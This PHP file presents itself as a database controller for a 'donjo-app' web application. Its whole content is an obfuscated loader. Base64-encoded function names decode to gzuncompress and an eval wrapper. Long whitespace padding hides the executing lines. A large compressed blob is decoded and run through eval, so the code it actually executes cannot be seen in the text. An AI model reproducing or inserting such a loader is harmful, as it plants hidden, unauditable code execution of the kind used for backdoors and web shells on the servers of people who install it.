<?php 
        $__='printf';$_='Loading donjo-app/controllers/Database.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
